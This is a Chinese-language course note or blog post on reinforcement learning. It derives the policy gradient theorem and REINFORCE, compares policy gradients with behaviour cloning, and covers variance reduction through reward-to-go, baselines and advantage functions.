普通视图

Received today — 2025年6月7日Arthals' ink

策略 II

2025年4月18日 03:34

从模仿学习到强化学习

模仿学习(IL)使用固定的专家数据进行离线学习(Offline Learning),通过行为克隆(BC)等方式模仿专家策略。其主要局限在于难以处理专家数据未覆盖的状态(OOD)

如果专家演示也有对错误状态或偏离专家轨迹情况的处理,那也能学的不错。

强化学习(RL)允许智能体与环境在线交互,通过试错和环境反馈(奖励)学习。这使得 RL 能够探索更广泛的状态空间并学习处理未知情况。

离线学习(Offline Learning):指学习过程无法干预数据的产生过程。我们只能使用一个预先收集好的、固定的数据集进行学习。模仿学习中的 BC 就是典型的离线学习。

在线学习(Online Learning):指智能体在学习过程中可以主动与环境交互,实时产生新的数据,并利用这些新数据更新自己的策略。强化学习通常可以在线进行。

与 BC 不同,RL 允许智能体与环境进行交互(从而可以探索到状态空间中更广泛的区域),可以做 Online 学习(但不是所有的 RL 算法都是 Online 的)。

强化学习基础与目标

强化学习的目标是找到一个最优策略参数 $\theta^*$,使得在该策略下产生的轨迹的期望回报最大化。即优化目标函数 $J(\theta)$:

$$ J(\theta) = \mathbb{E}{\tau \sim p\theta(\tau)} [R(\tau)] = \mathbb{E}{\tau \sim p\theta(\tau)} \left[ \sum_{t=0}^{T} r(s_t, a_t) \right] $$

这里,$p_\theta(\tau)$ 表示由策略 $\pi_\theta$ 与环境交互产生的轨迹 $\tau$ 的概率分布,这个分布由策略 $\pi_\theta$ 和环境共同决定。

由于策略和环境都可能具有随机性,单次轨迹的回报 $R(\tau)$ 可能不同。因此,我们的目标是在所有可能轨迹的分布上,最大化期望回报。我们主要关注 有限时间步(finite horizon) 的情况,即任务在 $T$ 步内完成。

策略梯度(Policy Gradient)

直接优化 $J(\theta)$ 通常很困难,因为期望的计算涉及到对所有可能轨迹的积分或求和,这在连续或高维状态动作空间中是难以处理的。

蒙特卡洛近似(Monte Carlo Approximation)

蒙特卡洛(Monte Carlo):多次采样求平均,从而近似地计算期望。

使用当前的策略 $\pi_\theta$ 与环境交互,生成 $N$ 条轨迹 $\tau^{(1)}, \tau^{(2)}, \ldots, \tau^{(N)}$。然后用这些样本的平均回报来近似期望回报:

$$ J(\theta) \approx \frac{1}{N} \sum_{i=1}^{N} R(\tau^{(i)}) = \frac{1}{N} \sum_{i=1}^{N} \sum_{t=0}^{T} r(s_t^{(i)}, a_t^{(i)}) $$

虽然我们可以近似 $J(\theta)$ 的值,但为了使用梯度上升(Gradient Ascent)方法来优化 $\theta$,我们需要计算目标函数关于参数 $\theta$ 的梯度 $\nabla_\theta J(\theta)$。

直接对蒙特卡洛近似形式求梯度是困难的,因为轨迹的生成过程 $\tau \sim p_\theta(\tau)$ 本身就依赖于 $\theta$。

策略梯度定理(Policy Gradient Theorem)

从期望的定义出发:

$$ J(\theta) = \int p_\theta(\tau) R(\tau) \mathrm{d}\tau $$

对其求梯度:

$$ \nabla_\theta J(\theta) = \nabla_\theta \int p_\theta(\tau) R(\tau) \mathrm{d}\tau = \int \nabla_\theta p_\theta(\tau) R(\tau) \mathrm{d}\tau $$

这里用到了梯度和积分可以交换顺序的假设。

引理(对数导数技巧):对于任何概率密度函数 $p_\theta(x)$,有 $\nabla_\theta p_\theta(x) = p_\theta(x) \nabla_\theta \log p_\theta(x)$。

证明:

应用链式法则于 $\log p_\theta(x)$:

$$ \begin{aligned} \nabla_\theta \log p_\theta(x) &= \left( \frac{\mathrm{d}}{\mathrm{d} p_\theta(x)} \log p_\theta(x) \right) \nabla_\theta p_\theta(x) \ &= \frac{1}{p_\theta(x)} \nabla_\theta p_\theta(x) \end{aligned} $$

这个等式成立的前提是 $p_\theta(x) > 0$。因为我们通常在概率密度函数的支撑集(support)上进行计算,这些地方的概率值是正的,所以这个假设通常是合理的。

现在,我们只需要将上式两边同时乘以 $p_\theta(x)$ 即可得到我们想要证明的公式:

$$ \begin{aligned} p_\theta(x) \nabla_\theta \log p_\theta(x) &= p_\theta(x) \left( \frac{1}{p_\theta(x)} \nabla_\theta p_\theta(x) \right) \ &= \nabla_\theta p_\theta(x) \end{aligned} $$

也即:

$$ \nabla_\theta p_\theta(x) = p_\theta(x) \nabla_\theta \log p_\theta(x) $$

将这个技巧应用于 $p_\theta(\tau)$:

$$ \nabla_\theta p_\theta(\tau) = p_\theta(\tau) \nabla_\theta \log p_\theta(\tau) $$

代入梯度表达式:

$$ \begin{aligned} \nabla_\theta J(\theta) &= \int \nabla_\theta p_\theta(\tau) R(\tau) \mathrm{d}\tau \ &= \int p_\theta(\tau) \nabla_\theta \log p_\theta(\tau) R(\tau) \mathrm{d}\tau \ &= \mathbb{E}{\tau \sim p\theta(\tau)} [\nabla_\theta \log p_\theta(\tau) R(\tau)] \end{aligned} $$

这个结果非常重要,它表明,目标函数的梯度可以表示为一个期望 (蒙特卡洛:来了嗷!)。

这意味着我们可以再次使用蒙特卡洛方法来估计这个梯度:采样 $N$ 条轨迹 $\tau^{(i)} \sim p_\theta(\tau)$,然后计算:

$$ \nabla_\theta J(\theta) \approx \frac{1}{N} \sum_{i=1}^{N} \nabla_\theta \log p_\theta(\tau^{(i)}) R(\tau^{(i)}) $$

请注意,这个梯度表达式中并没有出现奖励函数 $R(\tau)$ 关于 $\theta$ 的梯度 $\nabla_\theta R(\tau)$。

梯度是通过 $\nabla_\theta \log p_\theta(\tau)$ 传入的。这意味着强化学习不需要奖励函数本身是可导的(极其重要!!!),甚至不需要知道奖励函数的具体形式。我们只需要能够从环境中获得每个时间步的奖励值 $r(s_t, a_t)$ 即可。

这极大地扩展了强化学习的应用范围,可以处理奖励是稀疏的、非连续的 (例如,任务成功为 1,失败为 0)等复杂情况。

利用马尔科夫性:

$$ p_\theta(\tau) = p(s_0) \prod_{t=0}^{T-1} \pi_\theta(a_t | s_t) p(s_{t+1} | s_t, a_t) $$

其中:

  • $p(s_0)$ 是初始状态分布的概率
  • $\pi_\theta(a_t | s_t)$ 是策略在状态 $s_t$ 选择动作 $a_t$ 的概率
  • $p(s_{t+1} | s_t, a_t)$ 是环境的状态转移概率,即在状态 $s_t$ 执行动作 $a_t$ 后转移到状态 $s_{t+1}$ 的概率

取对数:

$$ \log p_\theta(\tau) = \log p(s_0) + \sum_{t=0}^{T-1} \left( \log \pi_\theta(a_t | s_t) + \log p(s_{t+1} | s_t, a_t) \right) $$

现在对 $\theta$ 求梯度 $\nabla_\theta$:

$$ \nabla_\theta \log p_\theta(\tau) = \nabla_\theta \log p(s_0) + \sum_{t=0}^{T-1} \left( \nabla_\theta \log \pi_\theta(a_t | s_t) + \nabla_\theta \log p(s_{t+1} | s_t, a_t) \right) $$

注意到:

  1. 初始状态分布 $p(s_0)$ 通常与策略参数 $\theta$ 无关,所以 $\nabla_\theta \log p(s_0) = 0$
  2. 环境的动态 $p(s_{t+1} | s_t, a_t)$ 描述的是环境模型中的状态转移概率,它也不依赖于我们正在学习的策略参数 $\theta$,因此 $\nabla_\theta \log p(s_{t+1} | s_t, a_t) = 0$

环境模型:包括状态转移概率 $p(s_{t+1} | s_t, a_t)$ 和奖励函数 $r(s_t, a_t)$,真实世界一般都拿不到。

  • Model-Free:我们不需要知道(甚至不需要学习)环境的模型。我们只需要能够与环境交互并从中采样即可(本课程主要是这个,在模拟器里可以随便模拟,也不需要显式建模)
  • Model-Based:会尝试利用神经网络去学习环境的模型,并利用模型进行规划或生成模拟数据(真实世界的 RL 一般需要用这个)

由此,梯度表达式简化为:

$$ \nabla_\theta \log p_\theta(\tau) = \sum_{t=0}^{T-1} \nabla_\theta \log \pi_\theta(a_t | s_t) $$

所以:

$$ \begin{aligned} \nabla_\theta J(\theta) &= \mathbb{E}{\tau \sim p\theta(\tau)} [\nabla_\theta \log p_\theta(\tau) R(\tau)] \ &= \mathbb{E}{\tau \sim p\theta(\tau)} \left[ \left( \sum_{t=0}^{T-1} \nabla_\theta \log \pi_\theta(a_t | s_t) \right) R(\tau) \right] \end{aligned} $$

由此,我们得到 最终的蒙特卡洛策略梯度估计

使用 $N$ 条采样轨迹 $\tau^{(1)}, \ldots, \tau^{(N)}$,其中 $\tau^{(i)} = (s_0^{(i)}, a_0^{(i)}, \ldots, s_T^{(i)}, a_T^{(i)})$ 且 $R(\tau^{(i)}) = \sum_{t=0}^{T} r(s_t^{(i)}, a_t^{(i)})$,策略梯度可以近似为:

$$ \hat{g} = \frac{1}{N} \sum_{i=1}^{N} \left[ \left( \sum_{t=0}^{T-1} \nabla_\theta \log \pi_\theta(a_t^{(i)} | s_t^{(i)}) \right) R(\tau^{(i)}) \right] $$

这个估计值 $\hat{g}$ 就是我们用来更新策略参数 $\theta$ 的梯度方向。

基础策略梯度算法(REINFORCE)

基于上述推导,我们可以得到一个基础的策略梯度算法流程(REINFORCE 算法):

  1. 初始化策略参数 $\theta$(例如,随机初始化神经网络的权重)。
  2. 循环以下步骤:
    1. 使用当前的策略 $\pi_\theta$ 与环境交互,采样 $N$ 条轨迹 ${\tau^{(i)}}_{i=1}^N$。
    2. 对于每条轨迹 $\tau^{(i)}$,计算其总回报 $R(\tau^{(i)}) = \sum_{t=0}^{T} r(s_t^{(i)}, a_t^{(i)})$。
    3. 计算策略梯度估计值 $\hat{g} = \frac{1}{N} \sum_{i=1}^{N} \left[ \left( \sum_{t=0}^{T-1} \nabla_\theta \log \pi_\theta(a_t^{(i)} | s_t^{(i)}) \right) R(\tau^{(i)}) \right]$。
    4. 使用梯度上升更新策略参数:$\theta \leftarrow \theta + \alpha \hat{g}$,其中 $\alpha$ 是学习率。

这个算法的直观意义是:

  • 对于回报 $R(\tau^{(i)})$ 较高的轨迹,我们会增大该轨迹中采取的动作 $a_t^{(i)}$ 在对应状态 $s_t^{(i)}$ 下被选中的概率(通过增大 $\log \pi_\theta(a_t^{(i)} | s_t^{(i)})$)
  • 对于回报较低的轨迹,则会减小其中动作被选中的概率。
  • 更新的幅度由整条轨迹的总回报 $R(\tau^{(i)})$ 来加权。

同策略(On-Policy):用于计算梯度 $\hat{g}$ 的轨迹 ${\tau^{(i)}}$ 必须是由当前正在优化的策略 $\pi_\theta$ 生成的。一旦策略参数 $\theta$ 被更新(步骤 d),之前采样得到的轨迹就不能再用于下一次的梯度计算了,因为它们是由旧策略生成的,不再符合新策略 $\pi_{\theta_{new}}$ 下的轨迹分布 $p_{\theta_{new}}(\tau)$。因此,在每次迭代中,我们都需要重新采样一批新的轨迹。

这种 On-Policy 的特性导致了策略梯度方法通常具有较高的 样本复杂度 (Sample Complexity),即需要大量的与环境交互的样本才能学习好策略,因为每次更新后数据就被丢弃了。这也是后续算法(如 PPO)试图改进的一个重要方面。

试错学习(Trial-and-Error):REINFORCE 体现了强化学习的核心思想 —— 试错。智能体尝试不同的动作,环境根据结果给出奖励。算法通过梯度更新,使得带来高奖励的动作(“好的尝试”)在未来更有可能被选中,而带来低奖励或惩罚的动作(“坏的尝试” 或 “错误”)则被抑制。

这个过程就像学习骑自行车,通过不断尝试和调整,逐渐学会保持平衡(获得 “不摔倒” 这个隐含的高奖励)。

策略梯度与行为克隆的对比

策略梯度(Policy Gradient, PG)方法和行为克隆(Behavior Cloning, BC)都是学习一个从状态 $s$ 到动作 $a$ 的映射(策略 $\pi_\theta(a|s)$),通常使用神经网络作为参数化模型 $\theta$。然而,它们的学习目标和更新规则有本质区别。

行为克隆的目标是最大化专家演示数据 $D_{expert} = {(s_i, a_i)}$ 的对数似然,可以通过蒙特卡洛估计来近似:

$$ \begin{aligned} \arg \max_\theta J_{BC}(\theta) &= \sum_{(s, a) \in D_{expert}} \log \pi_\theta(a|s) \ &\approx \arg \max_\theta \frac{1}{N} \sum_{i=1}^{N} \left[ \sum_{t=0}^{T-1} \log \pi_\theta(a_i^{(t)}|s_i^{(t)}) \right] \end{aligned} $$

其梯度为:

$$ \begin{aligned} \nabla_\theta J_{BC}(\theta) &= \sum_{(s, a) \in D_{expert}} \nabla_\theta \log \pi_\theta(a|s) \ & \approx \frac{1}{N} \sum_{i=1}^{N} \left[ \sum_{t=0}^{T-1} \nabla_\theta \log \pi_\theta(a_i^{(t)}|s_i^{(t)}) \right] \end{aligned} $$

行为克隆试图让策略网络在专家访问过的状态 $s$ 下,输出专家采取的动作 $a$ 的概率尽可能高。它假设专家演示中的所有状态 - 动作对都是最优且等价重要的

策略梯度的目标是最大化期望回报 $J(\theta) = \mathbb{E}{\tau \sim p\theta(\tau)} [R(\tau)]$,其梯度(使用蒙特卡洛估计)为:

$$ \nabla_\theta J(\theta) \approx \hat{g} = \frac{1}{N} \sum_{i=1}^{N} \left[ \left( \sum_{t=0}^{T-1} \nabla_\theta \log \pi_\theta(a_t^{(i)} | s_t^{(i)}) \right) R(\tau^{(i)}) \right] $$

策略梯度也通过 $\nabla_\theta \log \pi_\theta(a_t | s_t)$ 项来调整动作的概率,但它引入了一个关键的权重因子:整条轨迹的回报 $R(\tau^{(i)})$

行为克隆可以看作是策略梯度的一种特殊情况,即假设所有演示轨迹的回报 $R(\tau)$ 都等于 1(或者某个常数)。它平等地对待演示数据中的每一个动作,试图无差别地模仿。

策略梯度则根据动作实际带来的结果也即 $R(\tau)$ 来调整策略。

  • 回报高的轨迹中的 $(s_t, a_t)$ 对会被赋予更大的权重,使得这些 “好” 动作的概率增加
  • 回报低的(甚至可能是负回报的)轨迹中的 $(s_t, a_t)$ 对会被赋予较小的(或负的)权重,使得这些 “坏” 动作的概率降低。

行为克隆的问题:由于无差别模仿,行为克隆会学习演示数据中的所有行为,包括专家可能存在的噪声、次优动作或不必要的习惯(例如演示者操作时手部的轻微抖动)。它无法区分哪些动作对于完成任务是关键的,哪些是无关紧要甚至有害的。

此外,如果演示数据过于 “完美”,只包含最优轨迹,那么策略在遇到训练时从未见过的、略微偏离的状态时,可能会因为缺乏相应的纠错经验而表现很差(Distribution Shift)。

如果你想让 BC 足够好:

  1. 正确覆盖所有的完美轨迹,且你训练的模型能够正确地 follow 这些轨迹
  2. 对各种 error 的 corner case 都有拽回来的部分覆盖,但不要有导致 error 发生的部分
  3. 省流就是尽最大可能避免与真实世界的 Distribution Shift

显然这比较困难。

  • BC:不断调 Demenstration,尝试满足上述条件
  • RL:不断地在环境中尝试

策略梯度(REINFORCE)的挑战

基础的策略梯度算法(REINFORCE)虽然原理简洁且不依赖模型和可导奖励,但在实际应用中面临严峻挑战:

高方差(High Variance)/ 嘈杂(Noisy)

蒙特卡洛方法通过采样 $N$ 条轨迹来估计梯度 $\nabla_\theta J(\theta)$。然而,由于环境和策略的随机性,单条轨迹的回报 $R(\tau^{(i)})$ 可能有很大波动。尤其是在复杂任务和长时序(large $T$)问题中,轨迹空间极其巨大,有限的 $N$ 条样本可能远不足以精确估计期望梯度。

这导致每次计算出的梯度估计值 $\hat{g}$ 噪声很大,围绕真实梯度方向剧烈波动。虽然理论上这个估计是 无偏 的(当 $N \to \infty$ 时收敛到真值),但在 $N$ 有限时,高方差会使得训练过程不稳定,收敛缓慢,甚至可能发散。

更直白的讲,梯度估计的随机性大,会导致即使使用相同的超参数,仅因采样轨迹不同,多次训练的结果(性能、学习曲线)也可能差异巨大,缺乏稳定性。这与结果通常更一致的监督学习不同,导致需要进行大 Batch Size 以及对超参数的充分试错。

样本效率低下(Low Sample Efficiency)

REINFORCE 是 On-Policy (同策略)算法。一旦策略参数 $\theta$ 更新,之前采集的数据就 “过时” 了,不能用于下一次梯度计算。这导致算法需要大量的交互样本才能学习,尤其对于交互成本高昂的环境(如真实机器人),这种样本效率是难以接受的。

On-Policy 与 Off-Policy 学习

On-Policy 和 Off-Policy 都属于 Online Learning,因为你需要持续地和环境交互,然后根据交互数据来更新策略。

  • On-Policy(同策略):学习算法使用的数据必须由当前正在优化的策略产生。每次策略更新后,旧数据失效。
    • 例如:REINFORCE、SARSA
    • 通常效果更好,直接优化当前策略的表现
    • 样本效率低 (贵)
  • Off-Policy(异策略):学习算法可以使用由不同策略(例如过去的策略、专家策略或其他探索策略)产生的数据。通常会使用重要性采样(Importance Sampling)等技术来修正数据分布不匹配的问题。
    • 例如:Q-Learning、DDPG、SAC
    • 样本效率高,可以利用历史数据(通常存储在 Replay Buffer 中)
    • 缺点是效果不一定好,优化目标与数据生成分布不一致可能导致问题(老是去学以前已经改正的)

高斯策略(Gaussian Policy)

随机策略(stochastic policy):输出的是一个概率分布而不是一个确定的动作。

高斯策略:实际执行的动作 $a_t$ 则从一个以 $\mu_\theta(s_t) = f(s_t)$ 为均值、协方差矩阵为 $\Sigma$ 的高斯分布中采样得到:

$$ \pi_\theta(a_t|s_t) = \mathcal{N}(\mu_\theta(s_t); \Sigma) = \mathcal{N}(f(s_t); \Sigma) $$

我们约定,$k$ 是动作空间的维度,$p$ 是参数的维度。

对于多元高斯分布,其概率密度函数的对数为:

$$ \begin{aligned} \log \pi_\theta(a_t|s_t) &= -\frac{1}{2} (a_t - \mu_\theta(s_t))^\top \Sigma^{-1} (a_t - \mu_\theta(s_t)) - \frac{k}{2}\log(2\pi) - \frac{1}{2}\log|\det(\Sigma)| \ &= -\frac{1}{2} | \mu_\theta(s_t) - a_t |^2_{\Sigma} + \text{const} \end{aligned} $$

$$ \nabla_\theta \log \pi_\theta(a_t|s_t) = \left(\frac{\partial \mu_\theta(s_t)}{\partial \theta}\right)^\top \Sigma^{-1} (a_t - \mu_\theta(s_t)) $$

其中,$| \mathbf{x} |^2_{\Sigma} = \mathbf{x}^\top \Sigma^{-1} \mathbf{x}$。如果协方差矩阵 $\Sigma$ 是一个对角矩阵,并且所有对角线元素都相等,即 $\Sigma = \sigma^2 I$,那结果就是 L2。

证明:

引理:

  1. 链式法则:令 $\mathbf{y}(\theta) = f(\mathbf{s}t) - \mathbf{a}t$,$g(\mathbf{y}) = \mathbf{y}^\top \Sigma^{-1} \mathbf{y}$,则 $\nabla\theta g(\mathbf{y}(\theta)) = \left(\frac{\partial \mathbf{y}}{\partial \theta}\right)^\top \nabla\mathbf{y} g(\mathbf{y})$
  2. 对于对称矩阵 $A$,$\nabla_\mathbf{x} (\mathbf{x}^\top A \mathbf{x}) = 2 A \mathbf{x}$。

所以,

$$ \begin{aligned} \nabla_\theta \log \pi_\theta(a_t|s_t) &= \nabla_\theta \left( -\frac{1}{2} (a_t - \mu_\theta(s_t))^\top \Sigma^{-1} (a_t - \mu_\theta(s_t)) \right) \ &= -\frac{1}{2} \nabla_\theta \left( (\mu_\theta(s_t) - a_t)^\top \Sigma^{-1} (\mu_\theta(s_t) - a_t) \right) \ &= -\frac{1}{2} \nabla_\theta \left( \mathbf{y}(\theta)^\top \Sigma^{-1} \mathbf{y}(\theta) \right) \quad (\text{令 } \mathbf{y}(\theta) = \mu_\theta(s_t) - a_t) \ &= -\frac{1}{2} \left(\frac{\partial \mathbf{y}}{\partial \theta}\right)^\top (\nabla_\mathbf{y} (\mathbf{y}^\top \Sigma^{-1} \mathbf{y})) \quad (\text{应用链式法则}) \ &= -\frac{1}{2} \left(\frac{\partial (\mu_\theta(s_t) - a_t)}{\partial \theta}\right)^\top (2 \Sigma^{-1} \mathbf{y}) \quad (\text{应用引理 2}) \ &= -\frac{1}{2} \left(\frac{\partial \mu_\theta(s_t)}{\partial \theta}\right)^\top (2 \Sigma^{-1} (\mu_\theta(s_t) - a_t)) \ &= - \left(\frac{\partial \mu_\theta(s_t)}{\partial \theta}\right)^\top \Sigma^{-1} (\mu_\theta(s_t) - a_t) \ &= \left(\frac{\partial \mu_\theta(s_t)}{\partial \theta}\right)^\top \Sigma^{-1} (a_t - \mu_\theta(s_t)) \end{aligned} $$

部分可观测性(Partial Observability)

在许多现实场景中,智能体无法获取环境的完整状态 $s_t$,只能得到一个观测值 $o_t$(例如,来自摄像头的图像)。这种情况被称为部分可观测马尔可夫决策过程(Partially Observable Markov Decision Process, POMDP)。此时,策略变为基于观测值的 $\pi_\theta(a_t|o_t)$。

一个重要的结论是:即使在部分可观测的情况下,策略梯度的基本形式依然成立。我们可以将推导过程中的 $s_t$ 替换为 $o_t$,得到:

$$ \nabla_\theta J(\theta) = \mathbb{E}{\tau \sim p\theta(\tau)} \left[ \left( \sum_{t=0}^{T-1} \nabla_\theta \log \pi_\theta(a_t | o_t) \right) R(\tau) \right] $$

其中 $\tau = (o_0, a_0, o_1, a_1, \ldots)$。这是因为策略梯度的推导并不依赖于状态的马尔可夫性质。

注意:虽然公式形式不变,但策略的学习效果现在受限于观测 $o_t$ 所包含的信息量。如果 $o_t$ 缺失了做出最优决策所必需的关键状态信息,那么即使使用策略梯度,也无法学到最优策略

在这种情况下,一种常用的方法是 利用历史信息,例如使用循环神经网络(RNN)作为策略网络,输入 $o_t$ 和之前的隐藏状态,以捕捉时间上的依赖关系。

降低策略梯度方差的技术

为了缓解 REINFORCE 的高方差问题,可以采用以下技巧:

奖励转置(Reward-to-Go)

原始的 REINFORCE 算法中,在计算 $t$ 时刻的梯度项 $\nabla_\theta \log \pi_\theta(a_t | s_t)$ 时,使用了整条轨迹的总回报 $R(\tau) = \sum_{t'=0}^{T} r_{t'}$ 作为权重。

思考:在 $t$ 时刻采取的动作 $a_t$ 只能影响从 $t$ 时刻及之后获得的奖励 $(r_t, r_{t+1}, \ldots, r_T)$,而无法影响 $t$ 时刻之前的奖励 $(r_0, \ldots, r_{t-1})$。因此,将过去的奖励也包含在权重中,引入了与当前决策无关的噪声。

改进:只使用从当前时刻 $t$ 开始到轨迹结束的累积奖励,即 奖励转置(Reward-to-Go),作为权重:

$$ \hat{Q}(s_t, a_t) = \sum_{t'=t}^{T} r(s_{t'}, a_{t'}) $$

修改后的策略梯度估计变为:

$$ \hat{g}{rtg} = \frac{1}{N} \sum{i=1}^{N} \sum_{t=0}^{T-1} \nabla_\theta \log \pi_\theta(a_t^{(i)} | s_t^{(i)}) \hat{Q}(s_t^{(i)}, a_t^{(i)}) $$

这种方法考虑了动作的因果影响,即一个动作只对未来的奖励负责

理论上可以证明,使用 Reward-to-Go 仍然是 $\nabla_\theta J(\theta)$ 的无偏估计,并且通常具有比使用总回报 $R(\tau)$ 更低的方差。

基线(Baseline)

另一个问题是,策略梯度对奖励的绝对值敏感。如果所有轨迹的回报都是正的(即使有好有坏),那么所有动作都会在一定程度上被 “鼓励”(梯度项为正)。我们更希望的是:比平均水平好的动作被鼓励,比平均水平差的动作被抑制。这可以同时降低方差,增强训练稳定性。

思路:从回报项中减去一个只依赖于状态 $s_t$ 的基线 $b(s_t)$。这个基线不依赖于具体采取的动作 $a_t$。

$$ \nabla_\theta J(\theta) = \mathbb{E}{\tau \sim p\theta(\tau)} \left[ \sum_{t=0}^{T-1} \nabla_\theta \log \pi_\theta(a_t | s_t) (\hat{Q}(s_t, a_t) - b(s_t)) \right] $$

可以证明,只要基线 $b(s_t)$ 不依赖于动作 $a_t$,减去它不会改变梯度的期望值(即估计仍然是无偏的),也即:

$$ \mathbb{E}{a_t \sim \pi\theta(\cdot|s_t)}[\nabla_\theta \log \pi_\theta(a_t|s_t) b(s_t)] = 0 $$

证明:

$$ \begin{aligned} \mathbb{E}{a_t \sim \pi\theta(\cdot|s_t)}[\nabla_\theta \log \pi_\theta(a_t|s_t) b(s_t)] &= b(s_t) \mathbb{E}{a_t \sim \pi\theta(\cdot|s_t)}[\nabla_\theta \log \pi_\theta(a_t|s_t)] \ &= b(s_t) \int \pi_\theta(a_t|s_t) \nabla_\theta \log \pi_\theta(a_t|s_t) \mathrm{d}a_t & & \text{(期望定义)} \ &= b(s_t) \int \pi_\theta(a_t|s_t) \frac{\nabla_\theta \pi_\theta(a_t|s_t)}{\pi_\theta(a_t|s_t)} \mathrm{d}a_t & & \text{(对数导数技巧)} \ &= b(s_t) \int \nabla_\theta \pi_\theta(a_t|s_t) \mathrm{d}a_t \ &= b(s_t) \nabla_\theta \int \pi_\theta(a_t|s_t) \mathrm{d}a_t \ &= b(s_t) \nabla_\theta (1) & & \text{(概率密度积分为 1)} \ &= b(s_t) \times 0 \ &= 0 \end{aligned} $$

目标:选择合适的基线 $b(s_t)$ 来最小化梯度估计的方差。

最优基线:虽然减去任何有效的基线都不会引入偏差,但不同的基线对降低方差的效果不同。最优的基线通常难以计算。

证明:我们可以分析梯度估计的方差。

令 $g(\tau, b) = \nabla_\theta \log p_\theta(\tau) (R(\tau) - b)$。

$$ \mathrm{Var}[g(\tau, b)] = \mathbb{E}[g(\tau, b)^2] - (\mathbb{E}[g(\tau, b)])^2 $$

由于 $\mathbb{E}[g(\tau, b)] = \mathbb{E}[\nabla_\theta \log p_\theta(\tau) R(\tau)]$(因为基线项期望为 0),它不依赖于 $b$。因此,最小化方差等价于最小化 $\mathbb{E}[g(\tau, b)^2]$:

$$ \mathbb{E}[g(\tau, b)^2] = \mathbb{E}[(\nabla_\theta \log p_\theta(\tau))^2 (R(\tau) - b)^2] $$

对 $b$ 求导并令其为 0:

$$ \frac{\mathrm{d}}{\mathrm{d}b} \mathbb{E}[(\nabla_\theta \log p_\theta(\tau))^2 (R(\tau) - b)^2] = \mathbb{E}[(\nabla_\theta \log p_\theta(\tau))^2 \times 2(R(\tau) - b) \times (-1)] = 0 $$

$$ \mathbb{E}[(\nabla_\theta \log p_\theta(\tau))^2 (R(\tau) - b)] = 0 $$

$$ \mathbb{E}[(\nabla_\theta \log p_\theta(\tau))^2 R(\tau)] = b , \mathbb{E}[(\nabla_\theta \log p_\theta(\tau))^2] $$

解出最优基线 $b^*$:

$$ b^* = \frac{\mathbb{E}[(\nabla_\theta \log p_\theta(\tau))^2 R(\tau)]}{\mathbb{E}[(\nabla_\theta \log p_\theta(\tau))^2]} $$

这个最优基线 $b^*$ 可以看作是回报 $R(\tau)$ 的期望,但使用梯度幅度的平方 $(\nabla_\theta \log p_\theta(\tau))^2$ 进行了加权。

采样均值基线

$$ b = \frac{1}{N} \sum_{i=1}^N R(\tau^{(i)}) $$

这里也可以使用平均 Reward-to-Go 作为基线。

这虽然不是最优的,但通常也能提供不错的方差降低效果。

注意,如果使用蒙特卡洛算法,不同的 $b$ 的选择的确会影响采样计算出的 $\nabla_\theta J(\theta)$ 近似值,但是这是由于采样不足,$N$ 不够大造成的。

状态价值函数基线

状态价值函数 $V^{\pi_\theta}(s_t)$:表示从状态 $s_t$ 开始,遵循策略 $\pi_\theta$ 之后所能获得的期望(折扣)Reward-to-Go 回报,它只依赖于状态 $s_t$ 和策略 $\pi_\theta$。

$$ V^{\pi_\theta}(s_t) = \mathbb{E}{\tau \sim p\theta(\tau)} \left[ \sum_{t'=t}^{T} \gamma^{t'-t} r_{t'} \middle| s_t \right] = \mathbb{E}{a_t \sim \pi\theta(\cdot|s_t)} [Q^{\pi_\theta}(s_t, a_t)] $$

动作价值函数 $Q^{\pi_\theta}(s_t, a_t)$:表示在状态 $s_t$ 采取动作 $a_t$ 后,再遵循策略 $\pi_\theta$ 所能获得的期望(折扣)Reward-to-Go 回报,它依赖于状态 $s_t$、动作 $a_t$ 和策略 $\pi_\theta$。

$$ Q^{\pi_\theta}(s_t, a_t) = \mathbb{E}{\tau \sim p\theta(\tau)} \left[ \sum_{t'=t}^{T} \gamma^{t'-t} r_{t'} \middle| s_t, a_t \right] = r(s_t, a_t) + \gamma \mathbb{E}{s{t+1} \sim P(\cdot|s_t, a_t)} [V^{\pi_\theta}(s_{t+1})] $$

优势函数(Advantage Function) $A^{\pi_\theta}(s_t, a_t)$:在状态 $s_t$ 采取特定动作 $a_t$ 相对于平均动作(也就是 $V^{\pi_\theta}(s_t)$ 作为基线)的好坏程度

$$ \begin{aligned} A^{\pi_\theta}(s_t, a_t) &= Q^{\pi_\theta}(s_t, a_t) - V^{\pi_\theta}(s_t) \ &= r(s_t, a_t) + \gamma \mathbb{E}{s{t+1} \sim P(\cdot|s_t, a_t)} [V^{\pi_\theta}(s_{t+1})] - V^{\pi_\theta}(s_t) \end{aligned} $$

这里引入了折扣因子 $\gamma \in [0, 1)$,它的作用是:

  1. 确保在无限时间步长问题中,累积回报是有限的。
  2. 表示对未来奖励的不确定性或对即时奖励的偏好。$\gamma$ 越小,越看重眼前的奖励。
  3. 隐式地鼓励尽早完成任务:因为越往后的奖励会被 $\gamma$ 折扣得越多,所以总回报最高的方式通常是尽快获得奖励。

现在,策略梯度现在可以写为:

$$ \nabla_\theta J(\theta) = \mathbb{E}{(s_t, a_t) \sim \pi\theta} [ \nabla_\theta \log \pi_\theta(a_t | s_t) A^{\pi_\theta}(s_t, a_t) ] $$

使用 $V(s_t)$ 作为基线后,权重项变为:

$$ \begin{aligned} \hat{A}(s_t, a_t) &= \hat{Q}(s_t, a_t) - \hat{V}(s_t) \ &= r(s_t, a_t) + \gamma \hat{V}(s_{t+1}) - \hat{V}(s_t) \ \end{aligned} $$

这里直接暴力地对期望 $\mathbb{E}{s{t+1} \sim P(\cdot|s_t, a_t)} [V^{\pi_\theta}(s_{t+1})]$ 进行蒙特卡洛估计。

$\hat{A}(s_t, a_t)$ 是优势函数的估计值。

  • $\hat{A}(s_t, a_t) > 0$:动作 $a_t$ 比平均表现要好,应该增加其概率
  • $\hat{A}(s_t, a_t) < 0$:动作 $a_t$ 比平均表现要差,应该降低其概率

估计 $V(s_t)$ 的方法

蒙特卡洛

计算在所有 $N$ 条轨迹中经过状态 $s_t$ 的样本的平均 Reward-to-Go 回报:

$$ \hat{V}(s_t) = \frac{1}{N} \sum_{i=1}^{N} \sum_{t'=t}^{T} \gamma^{t' - t} r(s_{t'}, a_{t'}) $$

神经网络

使用另一个神经网络(称为 Critic)来学习并预测 $V(s_t)$:

$$ \hat{V}(s) = \hat{V}_{\phi}(s) $$

不要被形式迷惑,这里就是要设法学一个 $s_t$ 的值函数。

所以,我们可以准备数据集:

$$ \mathcal{D} = { (s_{i,t}, \underbrace{r(s_{i,t}, a_{i,t}) + \gamma \hat{V}{\phi}^{\pi}(s{i,t+1})}{y{i,t}}) } $$

